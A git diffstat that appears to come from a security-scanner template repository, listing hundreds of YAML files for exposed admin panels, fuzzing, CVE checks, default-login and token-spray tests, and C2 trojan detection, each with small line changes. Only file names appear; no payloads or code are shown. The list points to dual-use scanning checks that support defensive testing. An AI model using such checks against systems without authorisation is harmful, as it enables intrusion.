+- http/exposed-panels/phabricator-login.yaml | 2 +- http/exposed-panels/phoronix-pane.yaml | 2 +- http/exposed-panels/php-mailer.yaml | 2 +- http/exposed-panels/phpcollab-panel.yaml | 2 +- http/exposed-panels/phpldapadmin-panel.yaml | 2 +- http/exposed-panels/phpminiadmin-panel.yaml | 2 +- http/exposed-panels/phpmyadmin-panel.yaml | 2 +- http/exposed-panels/phppgadmin-panel.yaml | 2 +- http/exposed-panels/pichome-panel.yaml | 2 +- http/exposed-panels/piwigo-panel.yaml | 2 +- http/exposed-panels/planet-estream-panel.yaml | 2 +- http/exposed-panels/plausible-panel.yaml | 2 +- http/exposed-panels/plesk-obsidian-login.yaml | 2 +- http/exposed-panels/plesk-onyx-login.yaml | 2 +- http/exposed-panels/pocketbase-panel.yaml | 2 +- http/exposed-panels/polycom-admin-detect.yaml | 2 +- http/exposed-panels/portainer-panel.yaml | 2 +- http/exposed-panels/posteio-admin-panel.yaml | 2 +- http/exposed-panels/posthog-admin-panel.yaml | 2 +- http/exposed-panels/powercom-network-manager.yaml | 2 +- http/exposed-panels/powerjob-panel.yaml | 2 +- http/exposed-panels/powerlogic-ion.yaml | 2 +- http/exposed-panels/processwire-login.yaml | 2 +- http/exposed-panels/project-insight-login.yaml | 2 +- http/exposed-panels/projectsend-login.yaml | 2 +- http/exposed-panels/prometheus-exposed-panel.yaml | 2 +- http/exposed-panels/proofpoint-protection-server-panel.yaml | 2 +- http/exposed-panels/proxmox-panel.yaml | 2 +- http/exposed-panels/pulsar-admin-console.yaml | 2 +- http/exposed-panels/pulsar-adminui-panel.yaml | 2 +- http/exposed-panels/pulsar360-admin-panel.yaml | 2 +- http/exposed-panels/pulse-secure-version.yaml | 2 +- http/exposed-panels/puppetboard-panel.yaml | 2 +- http/exposed-panels/pure-storage-login.yaml | 2 +- http/exposed-panels/pyload-panel.yaml | 2 +- http/exposed-panels/pypicloud-panel.yaml | 2 +- http/exposed-panels/qBittorrent-panel.yaml | 2 +- http/exposed-panels/qdpm-login-panel.yaml | 2 +- http/exposed-panels/qlik-sense-server.yaml | 2 +- http/exposed-panels/qlikview-accesspoint-panel.yaml | 2 +- http/exposed-panels/qmail-admin-login.yaml | 2 +- http/exposed-panels/qnap/qnap-photostation-panel.yaml | 2 +- http/exposed-panels/qnap/qnap-qts-panel.yaml | 2 +- http/exposed-panels/qualcomm-voip-router.yaml | 2 +- http/exposed-panels/qualtrics-login.yaml | 2 +- http/exposed-panels/quantum-scalar-detect.yaml | 2 +- http/exposed-panels/quilium-panel.yaml | 2 +- http/exposed-panels/rabbitmq-dashboard.yaml | 2 +- http/exposed-panels/racksnet-login.yaml | 2 +- http/exposed-panels/rancher-dashboard.yaml | 2 +- http/exposed-panels/rancher-panel.yaml | 2 +- http/exposed-panels/rcdevs-webadm-panel.yaml | 2 +- http/exposed-panels/rdweb-panel.yaml | 2 +- http/exposed-panels/red-lion-panel.yaml | 2 +- http/exposed-panels/redash-panel.yaml | 2 +- http/exposed-panels/redhat/redhat-satellite-panel.yaml | 2 +- http/exposed-panels/redis-enterprise-panel.yaml | 2 +- http/exposed-panels/redmine-panel.yaml | 2 +- http/exposed-panels/regify-panel.yaml | 2 +- http/exposed-panels/remedy-axis-login.yaml | 2 +- http/exposed-panels/repetier-server-panel.yaml | 2 +- http/exposed-panels/reportico-admin-panel.yaml | 2 +- http/exposed-panels/residential-gateway-login.yaml | 2 +- http/exposed-panels/retool-login.yaml | 2 +- http/exposed-panels/riseup-panel.yaml | 2 +- http/exposed-panels/rocketchat-panel.yaml | 2 +- http/exposed-panels/rocketmq-console-exposure.yaml | 2 +- http/exposed-panels/room-alert-detect.yaml | 2 +- http/exposed-panels/roxy-fileman.yaml | 2 +- http/exposed-panels/royalevent-management-panel.yaml | 2 +- http/exposed-panels/ruckus-unleashed-panel.yaml | 2 +- http/exposed-panels/ruckus-wireless-admin-login.yaml | 2 +- http/exposed-panels/ruijie/rg-uac-panel.yaml | 2 +- http/exposed-panels/rundeck-login.yaml | 2 +- http/exposed-panels/rustici-content-controller.yaml | 2 +- http/exposed-panels/safenet-authentication-panel.yaml | 2 +- http/exposed-panels/sage-panel.yaml | 2 +- http/exposed-panels/saltstack-config-panel.yaml | 2 +- http/exposed-panels/samba-swat-panel.yaml | 2 +- http/exposed-panels/samsung-printer-detect.yaml | 2 +- http/exposed-panels/sap-cloud-analytics.yaml | 2 +- http/exposed-panels/sap-netweaver-portal.yaml | 2 +- http/exposed-panels/sap-successfactors-detect.yaml | 2 +- http/exposed-panels/sapfiori-panel.yaml | 2 +- http/exposed-panels/sas-login-panel.yaml | 2 +- http/exposed-panels/satis-repository.yaml | 2 +- http/exposed-panels/sauter-moduwebvision-panel.yaml | 2 +- http/exposed-panels/scribble-diffusion-panel.yaml | 2 +- http/exposed-panels/scriptcase/scriptcase-panel.yaml | 2 +- http/exposed-panels/scriptcase/scriptcase-prod-login.yaml | 2 +- http/exposed-panels/seafile-panel.yaml | 2 +- http/exposed-panels/seagate-nas-login.yaml | 2 +- http/exposed-panels/securepoint-utm.yaml | 2 +- http/exposed-panels/security-onion-panel.yaml | 2 +- http/exposed-panels/seeddms-panel.yaml | 2 +- http/exposed-panels/selfcheck-panel.yaml | 2 +- http/exposed-panels/sensu-panel.yaml | 2 +- http/exposed-panels/sentinelone-console.yaml | 2 +- http/exposed-panels/sentry-panel.yaml | 2 +- http/exposed-panels/servicedesk-login-panel.yaml | 2 +- http/exposed-panels/servicenow-panel.yaml | 2 +- http/exposed-panels/sevone-nms-network-manager.yaml | 2 +- http/exposed-panels/shardingsphere-panel.yaml | 2 +- http/exposed-panels/sharefile-panel.yaml | 2 +- http/exposed-panels/shell-box.yaml | 2 +- http/exposed-panels/sidekiq-dashboard.yaml | 2 +- http/exposed-panels/signet-explorer-dashboard.yaml | 2 +- http/exposed-panels/sitefinity-login.yaml | 2 +- http/exposed-panels/siteomat-login.yaml | 2 +- http/exposed-panels/skeepers-panel.yaml | 2 +- http/exposed-panels/skycaiji-admin-panel.yaml | 2 +- http/exposed-panels/smartping-dashboard.yaml | 2 +- http/exposed-panels/snapcomms-panel.yaml | 2 +- http/exposed-panels/softether-vpn-panel.yaml | 2 +- http/exposed-panels/solarview-compact-panel.yaml | 2 +- http/exposed-panels/solarwinds-arm-panel.yaml | 2 +- http/exposed-panels/solarwinds-orion.yaml | 2 +- http/exposed-panels/solarwinds-servuftp-detect.yaml | 2 +- http/exposed-panels/solr-panel-exposure.yaml | 2 +- http/exposed-panels/somansa-dlp-detect.yaml | 2 +- http/exposed-panels/sonarqube-login.yaml | 2 +- http/exposed-panels/sonic-wall-application.yaml | 2 +- http/exposed-panels/sonic-wall-login.yaml | 2 +- http/exposed-panels/sonicwall-analyzer-login.yaml | 2 +- http/exposed-panels/sonicwall-management-panel.yaml | 2 +- http/exposed-panels/sonicwall-sslvpn-panel.yaml | 2 +- http/exposed-panels/sophos-fw-version-detect.yaml | 2 +- http/exposed-panels/sophos-mobile-panel.yaml | 2 +- http/exposed-panels/sophos-web-appliance.yaml | 2 +- http/exposed-panels/spacelogic-cbus-panel.yaml | 2 +- http/exposed-panels/spark-panel.yaml | 2 +- http/exposed-panels/speedtest-panel.yaml | 2 +- http/exposed-panels/sphider-login.yaml | 2 +- http/exposed-panels/sphinxonline-panel.yaml | 2 +- http/exposed-panels/splunk-enterprise-panel.yaml | 2 +- http/exposed-panels/spotweb-login-panel.yaml | 2 +- http/exposed-panels/sql-monitor.yaml | 2 +- http/exposed-panels/sqlbuddy-panel.yaml | 2 +- http/exposed-panels/squirrelmail-login.yaml | 2 +- http/exposed-panels/sqwebmail-login-panel.yaml | 2 +- http/exposed-panels/star-network-utility.yaml | 2 +- http/exposed-panels/steve-login-panel.yaml | 2 +- http/exposed-panels/storybook-panel.yaml | 2 +- http/exposed-panels/strapi-documentation.yaml | 2 +- http/exposed-panels/strapi-panel.yaml | 2 +- http/exposed-panels/structurizr-panel.yaml | 2 +- http/exposed-panels/subrion-login.yaml | 2 +- http/exposed-panels/sugarcrm-panel.yaml | 2 +- http/exposed-panels/sunbird-dcim-panel.yaml | 2 +- http/exposed-panels/sungrow-logger1000-detect.yaml | 2 +- http/exposed-panels/superadmin-ui-panel.yaml | 2 +- http/exposed-panels/supermicro-bmc-panel.yaml | 2 +- http/exposed-panels/superset-login.yaml | 2 +- http/exposed-panels/syfadis-xperience-panel.yaml | 2 +- http/exposed-panels/symantec/symantec-dlp-login.yaml | 2 +- http/exposed-panels/symantec/symantec-epm-login.yaml | 2 +- http/exposed-panels/symantec/symantec-iam-console.yaml | 2 +- http/exposed-panels/symantec/symantec-phishing-panel.yaml | 2 +- http/exposed-panels/synapse-mobility-panel.yaml | 2 +- http/exposed-panels/syncserver-panel.yaml | 2 +- http/exposed-panels/syncthru-web-service.yaml | 2 +- http/exposed-panels/synopsys-coverity-panel.yaml | 2 +- http/exposed-panels/sysaid-panel.yaml | 2 +- http/exposed-panels/tableau-panel.yaml | 2 +- http/exposed-panels/tableau-service-manager.yaml | 2 +- http/exposed-panels/tailon-panel.yaml | 2 +- http/exposed-panels/tautulli-panel.yaml | 2 +- http/exposed-panels/teamcity-login-panel.yaml | 2 +- http/exposed-panels/teamforge-panel.yaml | 2 +- http/exposed-panels/teampass-panel.yaml | 2 +- http/exposed-panels/tekton-dashboard.yaml | 2 +- http/exposed-panels/telerik-server-login.yaml | 2 +- http/exposed-panels/telesquare/tlr-2005ksh-login.yaml | 2 +- http/exposed-panels/teltonika-login.yaml | 2 +- http/exposed-panels/tembosocial-panel.yaml | 2 +- http/exposed-panels/tenda-11n-wireless-router-login.yaml | 2 +- http/exposed-panels/tenda-web-master.yaml | 2 +- http/exposed-panels/teradek-panel.yaml | 2 +- http/exposed-panels/teradici-pcoip-panel.yaml | 2 +- http/exposed-panels/terraform-enterprise-panel.yaml | 2 +- http/exposed-panels/thinfinity-virtualui-panel.yaml | 2 +- http/exposed-panels/thruk-login.yaml | 2 +- http/exposed-panels/tibco-spotfire-panel.yaml | 2 +- http/exposed-panels/tigase-xmpp-server.yaml | 2 +- http/exposed-panels/tikiwiki-cms.yaml | 2 +- http/exposed-panels/tiny-file-manager.yaml | 2 +- http/exposed-panels/tiny-rss-panel.yaml | 2 +- http/exposed-panels/tixeo-panel.yaml | 2 +- http/exposed-panels/tomcat/tomcat-exposed-docs.yaml | 2 +- http/exposed-panels/tooljet-panel.yaml | 2 +- http/exposed-panels/total-web-solutions-panel.yaml | 2 +- http/exposed-panels/totemomail-panel.yaml | 2 +- http/exposed-panels/tracer-sc-login.yaml | 2 +- http/exposed-panels/traefik-dashboard.yaml | 2 +- http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml | 2 +- http/exposed-panels/truenas-scale-panel.yaml | 2 +- http/exposed-panels/tufin-securetrack-login.yaml | 2 +- http/exposed-panels/tup-openframe.yaml | 2 +- http/exposed-panels/turnkey-openvpn.yaml | 2 +- http/exposed-panels/typo3-login.yaml | 2 +- http/exposed-panels/uipath-orchestrator-panel.yaml | 2 +- http/exposed-panels/umbraco-login.yaml | 2 +- http/exposed-panels/unauth-xproxy-dashboard.yaml | 2 +- http/exposed-panels/unauth/tautulli-unauth.yaml | 2 +- http/exposed-panels/unibox-panel.yaml | 2 +- http/exposed-panels/unleash-panel.yaml | 2 +- http/exposed-panels/untangle-admin-login.yaml | 2 +- http/exposed-panels/uptime-kuma-panel.yaml | 2 +- http/exposed-panels/v2924-admin-panel.yaml | 2 +- http/exposed-panels/vault-panel.yaml | 2 +- http/exposed-panels/veeam-backup-gcp.yaml | 2 +- http/exposed-panels/veriz0wn-osint.yaml | 2 +- http/exposed-panels/verizon-router-panel.yaml | 2 +- http/exposed-panels/versa/versa-director-login.yaml | 2 +- http/exposed-panels/versa/versa-flexvnf-panel.yaml | 2 +- http/exposed-panels/vertex-tax-panel.yaml | 2 +- http/exposed-panels/vinchin-panel.yaml | 2 +- http/exposed-panels/virtua-software-panel.yaml | 2 +- http/exposed-panels/vistaweb-panel.yaml | 2 +- http/exposed-panels/vmware-carbon-black-edr.yaml | 2 +- http/exposed-panels/vmware-cloud-availability.yaml | 2 +- http/exposed-panels/vmware-cloud-director.yaml | 2 +- http/exposed-panels/vmware-ftp-server.yaml | 2 +- http/exposed-panels/vmware-hcx-login.yaml | 2 +- http/exposed-panels/vmware-horizon-daas.yaml | 2 +- http/exposed-panels/vmware-horizon-panel.yaml | 2 +- http/exposed-panels/vmware-nsx-login.yaml | 2 +- http/exposed-panels/vmware-vcenter-converter-standalone.yaml | 2 +- http/exposed-panels/vmware-vcloud-director.yaml | 2 +- http/exposed-panels/vodafone-voxui-panel.yaml | 2 +- http/exposed-panels/voipmonitor-panel.yaml | 2 +- http/exposed-panels/vrealize-loginsight-panel.yaml | 2 +- http/exposed-panels/vue-pacs-panel.yaml | 2 +- http/exposed-panels/wagtail-cms-detect.yaml | 2 +- http/exposed-panels/wampserver-homepage.yaml | 2 +- http/exposed-panels/watcher-panel.yaml | 2 +- http/exposed-panels/watchguard-panel.yaml | 2 +- http/exposed-panels/watershed-panel.yaml | 2 +- http/exposed-panels/wazuh-panel.yaml | 2 +- http/exposed-panels/wd-mycloud-panel.yaml | 2 +- http/exposed-panels/web-file-manager.yaml | 2 +- http/exposed-panels/web-viewer-panel.yaml | 2 +- http/exposed-panels/webcomco-panel.yaml | 2 +- http/exposed-panels/webeditors-check-detect.yaml | 2 +- http/exposed-panels/weblogic-login.yaml | 2 +- http/exposed-panels/weblogic-uddiexplorer.yaml | 2 +- http/exposed-panels/webmin-panel.yaml | 2 +- http/exposed-panels/webmodule-ee-panel.yaml | 2 +- http/exposed-panels/webroot-login.yaml | 2 +- http/exposed-panels/webshell4-login-panel.yaml | 2 +- http/exposed-panels/webtitan-cloud-panel.yaml | 2 +- http/exposed-panels/webtransfer-client-panel.yaml | 2 +- http/exposed-panels/webuzo-admin-panel.yaml | 2 +- http/exposed-panels/weiphp-panel.yaml | 2 +- http/exposed-panels/whm-login-detect.yaml | 2 +- http/exposed-panels/wiren-board-webui.yaml | 2 +- http/exposed-panels/wmw-enterprise-panel.yaml | 2 +- http/exposed-panels/wordpress-login.yaml | 2 +- http/exposed-panels/workspace-one-uem.yaml | 2 +- http/exposed-panels/wowza-streaming-engine.yaml | 2 +- http/exposed-panels/ws_ftp-server-web-transfer.yaml | 2 +- http/exposed-panels/wso2-management-console.yaml | 2 +- http/exposed-panels/xeams-admin-console.yaml | 2 +- http/exposed-panels/xenmobile-login.yaml | 2 +- http/exposed-panels/xfinity-panel.yaml | 2 +- http/exposed-panels/xibocms-login.yaml | 2 +- http/exposed-panels/xnat-login.yaml | 2 +- http/exposed-panels/xoops/xoops-installation-wizard.yaml | 2 +- http/exposed-panels/xvr-login.yaml | 2 +- http/exposed-panels/xweb500-panel.yaml | 2 +- http/exposed-panels/xxljob-panel.yaml | 2 +- http/exposed-panels/yarn-manager-exposure.yaml | 2 +- http/exposed-panels/yellowfin-panel.yaml | 2 +- http/exposed-panels/yzmcms-panel.yaml | 2 +- http/exposed-panels/zabbix-server-login.yaml | 2 +- http/exposed-panels/zblog-exposed-admin-panel.yaml | 2 +- http/exposed-panels/zenario-login-panel.yaml | 2 +- http/exposed-panels/zentao-detect.yaml | 2 +- http/exposed-panels/zeroshell-login.yaml | 2 +- http/exposed-panels/zimbra-web-client.yaml | 2 +- http/exposed-panels/zimbra-web-login.yaml | 2 +- http/exposed-panels/zipkin-exposure.yaml | 2 +- http/exposed-panels/zoho/manageengine-adaudit.yaml | 2 +- http/exposed-panels/zoho/manageengine-adselfservice.yaml | 2 +- http/exposed-panels/zoho/manageengine-analytics.yaml | 2 +- http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml | 2 +- .../exposed-panels/zoho/manageengine-applications-manager.yaml | 2 +- http/exposed-panels/zoho/manageengine-assetexplorer.yaml | 2 +- http/exposed-panels/zoho/manageengine-desktop.yaml | 2 +- http/exposed-panels/zoho/manageengine-network-config.yaml | 2 +- http/exposed-panels/zoho/manageengine-opmanager.yaml | 2 +- http/exposed-panels/zoho/manageengine-servicedesk.yaml | 2 +- http/exposed-panels/zoho/manageengine-supportcenter.yaml | 2 +- http/exposed-panels/zoneminder-login.yaml | 2 +- http/exposed-panels/zte-panel.yaml | 2 +- http/exposed-panels/zyxel-router-panel.yaml | 2 +- http/exposed-panels/zyxel/zyxel-firewall-panel.yaml | 2 +- http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml | 2 +- http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml | 2 +- http/exposures/apis/drupal-jsonapi-user-listing.yaml | 3 +-- http/exposures/configs/deployment-ini.yaml | 2 +- http/exposures/files/generic-db.yaml | 2 +- http/exposures/files/ht-deployment.yaml | 2 +- http/exposures/files/wordpress-readme-file.yaml | 3 +-- http/exposures/logs/milesight-system-log.yaml | 3 +-- http/fuzzing/cache-poisoning-fuzz.yaml | 2 +- http/fuzzing/header-command-injection.yaml | 2 +- http/fuzzing/iis-shortname.yaml | 2 +- http/fuzzing/linux-lfi-fuzzing.yaml | 2 +- http/fuzzing/mdb-database-file.yaml | 2 +- http/fuzzing/prestashop-module-fuzz.yaml | 2 +- http/fuzzing/ssrf-via-proxy.yaml | 2 +- http/fuzzing/valid-gmail-check.yaml | 2 +- http/fuzzing/waf-fuzz.yaml | 2 +- http/fuzzing/wordpress-plugins-detect.yaml | 2 +- http/fuzzing/wordpress-themes-detect.yaml | 2 +- http/fuzzing/wordpress-weak-credentials.yaml | 2 +- http/fuzzing/xff-403-bypass.yaml | 2 +- http/honeypot/citrix-honeypot-detect.yaml | 3 +-- http/honeypot/dionaea-http-honeypot-detect.yaml | 3 +-- http/honeypot/snare-honeypot-detect.yaml | 3 +-- http/honeypot/tpot-honeypot-detect.yaml | 2 +- http/iot/kyocera-printer-panel.yaml | 3 +-- http/iot/netgear-boarddataww-rce.yaml | 2 +- http/miscellaneous/balada-injector-malware.yaml | 2 +- http/miscellaneous/cloudflare-rocketloader-htmli.yaml | 2 +- http/miscellaneous/defacement-detect.yaml | 2 +- http/miscellaneous/directory-listing.yaml | 2 +- http/miscellaneous/form-detection.yaml | 2 +- http/miscellaneous/microsoft-azure-error.yaml | 2 +- http/misconfiguration/aws/cdn-cache-poisoning.yaml | 2 +- http/misconfiguration/corebos-htaccess.yaml | 3 +-- http/misconfiguration/dlink-unauth-cgi-script.yaml | 2 +- http/misconfiguration/dont-panic-traceback.yaml | 2 +- http/misconfiguration/doris-dashboard.yaml | 2 +- http/misconfiguration/drupal/drupal-user-enum-ajax.yaml | 3 +-- http/misconfiguration/filebrowser-unauth.yaml | 2 +- http/misconfiguration/genieacs-default-jwt.yaml | 3 +-- http/misconfiguration/h2o/h2o-arbitary-file-read.yaml | 2 +- http/misconfiguration/https-to-http-redirect.yaml | 2 +- http/misconfiguration/imgproxy-unauth.yaml | 2 +- http/misconfiguration/installer/drupal-install.yaml | 2 +- http/misconfiguration/installer/eyoucms-installer.yaml | 2 +- http/misconfiguration/installer/gibbon-installer.yaml | 2 +- http/misconfiguration/installer/ids-skills-installer.yaml | 2 +- http/misconfiguration/installer/trilium-notes-installer.yaml | 2 +- http/misconfiguration/installer/zabbix-installer.yaml | 2 +- http/misconfiguration/intelbras-dvr-unauth.yaml | 2 +- http/misconfiguration/mlflow-unauth.yaml | 3 +-- http/misconfiguration/node-express-dev-env.yaml | 2 +- http/misconfiguration/php/php-composer-binary.yaml | 2 +- http/misconfiguration/sap/sap-netweaver-info-leak.yaml | 3 +-- http/misconfiguration/thanos-prometheus-exposure.yaml | 2 +- http/misconfiguration/unigui-server-monitor-exposure.yaml | 2 +- http/osint/user-enumeration/piratebay.yaml | 2 +- http/takeovers/worksites-takeover.yaml | 2 +- http/technologies/apache/apache-answer-detect.yaml | 2 +- http/technologies/apache/tomcat-detect.yaml | 2 +- http/technologies/arcgis-rest-api.yaml | 2 +- http/technologies/arcgis-tokens.yaml | 2 +- http/technologies/boa-web-server.yaml | 2 +- http/technologies/celebrus-detect.yaml | 2 +- http/technologies/citrix-xenmobile-version.yaml | 2 +- http/technologies/confluence-detect.yaml | 2 +- http/technologies/cowboy-detect.yaml | 2 +- http/technologies/craftercms-detect.yaml | 2 +- http/technologies/erxes-detect.yaml | 3 +-- http/technologies/harbor-detect.yaml | 3 +-- http/technologies/hikvision-detect.yaml | 3 +-- http/technologies/jenkins-detect.yaml | 2 +- http/technologies/jira-detect.yaml | 2 +- http/technologies/meilisearch-detect.yaml | 2 +- http/technologies/microfocus-iprint-detect.yaml | 2 +- http/technologies/microweber-detect.yaml | 3 +-- http/technologies/monstracms-detect.yaml | 3 +-- http/technologies/piwigo-detect.yaml | 3 +-- http/technologies/privatebin-detect.yaml | 2 +- http/technologies/sap/sap-netweaver-detect.yaml | 2 +- http/technologies/sap/sap-web-dispatcher-admin-portal.yaml | 3 +-- http/technologies/simplesamlphp-detect.yaml | 2 +- http/technologies/sparklighter-detect.yaml | 2 +- http/technologies/tibco-spotfire-services-detect.yaml | 2 +- http/technologies/uni-gui-framework.yaml | 2 +- http/technologies/wordpress-detect.yaml | 2 +- .../technologies/wordpress/themes/wp-bricks-builder-theme.yaml | 2 +- http/technologies/yourls-detect.yaml | 2 +- http/token-spray/api-mailchimp.yaml | 3 +-- http/token-spray/api-sendgrid.yaml | 3 +-- http/token-spray/api-travisci.yaml | 2 +- http/vulnerabilities/backdoor/cisco-implant-detect.yaml | 3 +-- http/vulnerabilities/citrix/citrix-oob-memory-read.yaml | 2 +- http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml | 2 +- http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml | 2 +- http/vulnerabilities/huatian/huatian-oa-sqli.yaml | 2 +- http/vulnerabilities/jorani/jorani-benjamin-xss.yaml | 3 +-- http/vulnerabilities/kkfileview-ssrf.yaml | 2 +- http/vulnerabilities/other/array-vpn-lfi.yaml | 2 +- http/vulnerabilities/other/cerio-dt-rce.yaml | 2 +- http/vulnerabilities/other/easycvr-info-leak.yaml | 2 +- http/vulnerabilities/other/microweber-xss.yaml | 3 +-- http/vulnerabilities/other/pmb-xss.yaml | 3 +-- http/vulnerabilities/other/quick-cms-sqli.yaml | 2 +- http/vulnerabilities/other/tendat-credential.yaml | 2 +- http/vulnerabilities/other/tikiwiki-xss.yaml | 3 +-- .../prestashop/prestashop-blocktestimonial-file-upload.yaml | 2 +- .../prestashop/prestashop-cartabandonmentpro-file-upload.yaml | 2 +- http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml | 2 +- .../wordpress/wordpress-accessible-wpconfig.yaml | 2 +- http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml | 2 +- http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-ambience-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-finder-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-flagem-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-knews-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-nextgen-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-securimage-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-slideshow-xss.yaml | 2 +- http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml | 2 +- http/vulnerabilities/wordpress/wp-user-enum.yaml | 2 +- javascript/backdoor/proftpd-backdoor.yaml | 2 +- javascript/cves/2012/CVE-2012-2122.yaml | 2 +- javascript/cves/2019/CVE-2019-9193.yaml | 2 +- javascript/cves/2020/CVE-2020-7247.yaml | 2 +- javascript/cves/2023/CVE-2023-34039.yaml | 2 +- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- javascript/cves/2023/CVE-2023-48795.yaml | 2 +- javascript/cves/2024/CVE-2024-23897.yaml | 2 +- javascript/default-logins/redis-default-logins.yaml | 2 +- javascript/detection/samba-detect.yaml | 2 +- javascript/enumeration/checkpoint-firewall-enum.yaml | 2 +- javascript/enumeration/minecraft-enum.yaml | 2 +- javascript/enumeration/mysql/mysql-default-login.yaml | 2 +- javascript/enumeration/mysql/mysql-info.yaml | 2 +- javascript/enumeration/pgsql/pgsql-default-db.yaml | 2 +- javascript/enumeration/pgsql/pgsql-file-read.yaml | 2 +- javascript/enumeration/pgsql/pgsql-list-database.yaml | 2 +- javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml | 2 +- javascript/enumeration/pgsql/pgsql-list-users.yaml | 2 +- javascript/enumeration/pgsql/pgsql-version-detect.yaml | 2 +- javascript/enumeration/pop3/pop3-capabilities-enum.yaml | 2 +- javascript/enumeration/redis/redis-info.yaml | 2 +- javascript/enumeration/redis/redis-require-auth.yaml | 2 +- javascript/enumeration/rsync/rsync-list-modules.yaml | 2 +- javascript/enumeration/smb/smb-default-creds.yaml | 2 +- javascript/enumeration/smb/smb-enum-domains.yaml | 2 +- javascript/enumeration/smb/smb-enum.yaml | 2 +- javascript/enumeration/smb/smb-os-detect.yaml | 2 +- javascript/enumeration/smb/smb-version-detect.yaml | 2 +- javascript/enumeration/smb/smb2-capabilities.yaml | 2 +- javascript/enumeration/smb/smb2-server-time.yaml | 2 +- javascript/misconfiguration/pgsql/pgsql-empty-password.yaml | 2 +- javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml | 2 +- javascript/misconfiguration/smb/smb-anonymous-access.yaml | 2 +- javascript/misconfiguration/smb/smb-shares.yaml | 2 +- javascript/misconfiguration/smb/smb-signing-not-required.yaml | 2 +- javascript/udp/detection/tftp-detect.yaml | 2 +- network/backdoor/backdoored-zte.yaml | 2 +- network/c2/darkcomet-trojan.yaml | 2 +- network/c2/darktrack-rat-trojan.yaml | 2 +- network/c2/orcus-rat-trojan.yaml | 2 +- network/c2/xtremerat-trojan.yaml | 2 +- network/cves/2001/CVE-2001-1473.yaml | 2 +- network/cves/2011/CVE-2011-2523.yaml | 2 +- network/cves/2015/CVE-2015-3306.yaml | 2 +- network/cves/2016/CVE-2016-2004.yaml | 2 +- network/cves/2016/CVE-2016-3510.yaml | 2 +- network/cves/2017/CVE-2017-3881.yaml | 2 +- network/cves/2017/CVE-2017-5645.yaml | 2 +- network/cves/2018/CVE-2018-2628.yaml | 2 +- network/cves/2018/CVE-2018-2893.yaml | 2 +- network/cves/2020/CVE-2020-11981.yaml | 2 +- network/cves/2020/CVE-2020-1938.yaml | 2 +- network/cves/2021/CVE-2021-44521.yaml | 2 +- network/cves/2022/CVE-2022-0543.yaml | 2 +- network/cves/2022/CVE-2022-24706.yaml | 2 +- network/cves/2022/CVE-2022-31793.yaml | 2 +- network/cves/2023/CVE-2023-33246.yaml | 2 +- network/default-login/ftp-anonymous-login.yaml | 2 +- network/default-login/ftp-weak-credentials.yaml | 2 +- network/default-login/ldap-anonymous-login.yaml | 2 +- network/detection/activemq-openwire-transport-detect.yaml | 2 +- network/detection/aix-websm-detect.yaml | 2 +- network/detection/apache-activemq-detect.yaml | 2 +- network/detection/aws-sftp-detect.yaml | 2 +- network/detection/axigen-mail-server-detect.yaml | 2 +- network/detection/bgp-detect.yaml | 2 +- network/detection/bitvise-ssh-detect.yaml | 2 +- network/detection/bluecoat-telnet-proxy-detect.yaml | 2 +- network/detection/cisco-finger-detect.yaml | 2 +- network/detection/clamav-detect.yaml | 2 +- network/detection/cql-native-transport.yaml | 2 +- network/detection/detect-addpac-voip-gateway.yaml | 2 +- network/detection/detect-jabber-xmpp.yaml | 2 +- network/detection/dotnet-remoting-service-detect.yaml | 2 +- network/detection/esmtp-detect.yaml | 2 +- network/detection/exim-detect.yaml | 2 +- network/detection/expn-mail-detect.yaml | 2 +- network/detection/finger-detect.yaml | 2 +- network/detection/gnu-inetutils-ftpd-detect.yaml | 2 +- network/detection/gopher-detect.yaml | 2 +- network/detection/ibm-d2b-database-server.yaml | 2 +- network/detection/imap-detect.yaml | 2 +- network/detection/iplanet-imap-detect.yaml | 2 +- network/detection/java-rmi-detect.yaml | 3 +-- network/detection/microsoft-ftp-service.yaml | 2 +- network/detection/mikrotik-ftp-server-detect.yaml | 2 +- network/detection/mikrotik-routeros-api.yaml | 2 +- network/detection/mongodb-detect.yaml | 2 +- network/detection/moveit-sftp-detect.yaml | 2 +- network/detection/msmq-detect.yaml | 2 +- network/detection/mysql-detect.yaml | 2 +- network/detection/openssh-detect.yaml | 2 +- network/detection/pgsql-detect.yaml | 2 +- network/detection/pop3-detect.yaml | 2 +- network/detection/proftpd-server-detect.yaml | 2 +- network/detection/rabbitmq-detect.yaml | 2 +- network/detection/rdp-detect.yaml | 2 +- network/detection/redis-detect.yaml | 2 +- network/detection/riak-detect.yaml | 2 +- network/detection/rpcbind-portmapper-detect.yaml | 2 +- network/detection/rsyncd-service-detect.yaml | 2 +- network/detection/rtsp-detect.yaml | 2 +- network/detection/sap-router.yaml | 2 +- network/detection/smtp-detect.yaml | 2 +- network/detection/sshd-dropbear-detect.yaml | 2 +- network/detection/starttls-mail-detect.yaml | 2 +- network/detection/teamspeak3-detect.yaml | 2 +- network/detection/telnet-detect.yaml | 2 +- network/detection/totemomail-smtp-detect.yaml | 2 +- network/detection/vmware-authentication-daemon-detect.yaml | 2 +- network/detection/vnc-service-detect.yaml | 2 +- network/detection/weblogic-iiop-detect.yaml | 2 +- network/detection/weblogic-t3-detect.yaml | 2 +- network/detection/wing-ftp-detect.yaml | 2 +- network/detection/ws_ftp-ssh-detect.yaml | 2 +- network/detection/xlight-ftp-service-detect.yaml | 2 +- network/enumeration/beanstalk-service.yaml | 2 +- 